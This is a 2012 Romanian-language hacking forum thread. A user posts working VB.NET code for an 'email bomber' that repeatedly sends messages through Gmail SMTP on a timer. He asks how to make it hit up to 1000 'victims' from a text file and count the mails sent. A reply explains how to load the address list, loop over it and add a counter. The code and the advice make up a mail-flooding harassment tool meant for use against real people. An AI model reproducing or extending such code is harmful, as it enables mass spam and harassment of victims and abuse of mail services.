H4ck3rPr4fz0rrr. Posted June 12, 2012 Report Share Posted June 12, 2012 Dupa cum mi-a spus si NemesisITSC sa fac un topic nou daca nu ma descurc am facut.As vrea sa fac un email bomber dar sa trimita la mai multe victime (1-1000) . Ori cu copy dintr-un notepad si paste in "TextBox" in program, ori sa faca import si sa le ia din notepad(nu stiu cum) .El arata asa:As vrea:Codul care-l am acum este:Imports System.Net.MailImports System.IOPublic Class Form1 Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Timer1.Start() End Sub Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click Timer1.Stop() End Sub Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick Dim MyMailMessage As New MailMessage Try MyMailMessage.From() = New MailAddress(TextBox1.Text) MyMailMessage.To.Add(TextBox3.Text) MyMailMessage.Subject = TextBox5.Text MyMailMessage.Body = (TextBox4.Text) Dim SMTP As New SmtpClient("smtp.gmail.com") SMTP.Port = 587 SMTP.EnableSsl = True SMTP.Credentials = New System.Net.NetworkCredential(TextBox1.Text, TextBox2.Text) SMTP.Send(MyMailMessage) Catch ex As Exception End Try End Sub Private Sub Button3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button3.Click Timer1.Interval = Textbox6.Text End SubEnd ClassCa sa aveti idee cum ar trebui codul, am un cod(nu facut de mine) dar trimite doar unui id. As vrea sa modific linia unde trimite, sa trimita mai multor id-uri. As vrea si un cod sa arate cate mailuri s-au trimis si linia respectiva care face asta (nu stiu care dintre alea de acolo arata, doresc numele) . Multumesc Anticipat, sper ca cineva sa ma ajute. Quote Link to comment Share on other sites More sharing options...
M2G Posted June 12, 2012 Report Share Posted June 12, 2012 (edited) In primul rand trebuie sa incarci fisierul cu mailurile si trebuie sa salvezi intr-o lista fiecare linie citita din acel fisier. Dupa ce ai facut asta ar trebui sa ai o lista cu toate mailurile din fisier.Cand vrei sa le trimiti doar parcurgi acea lista cu un for si trimiti un mail pentru fiecare. Ca sa afiseze cate a trimis faci un contor pe care il incrementezi dupa fiecare trimitere.Reading a Text file Line by Line - Visual Basic - Source Code | DreamInCode.netArrayList Class (System.Collections)How to use VB.NET ArrayListVB.NET Collections TutorialsInvata sa scrii cod. Ce faci tu, nu e programare. Edited June 12, 2012 by M2G Quote Link to comment Share on other sites More sharing options...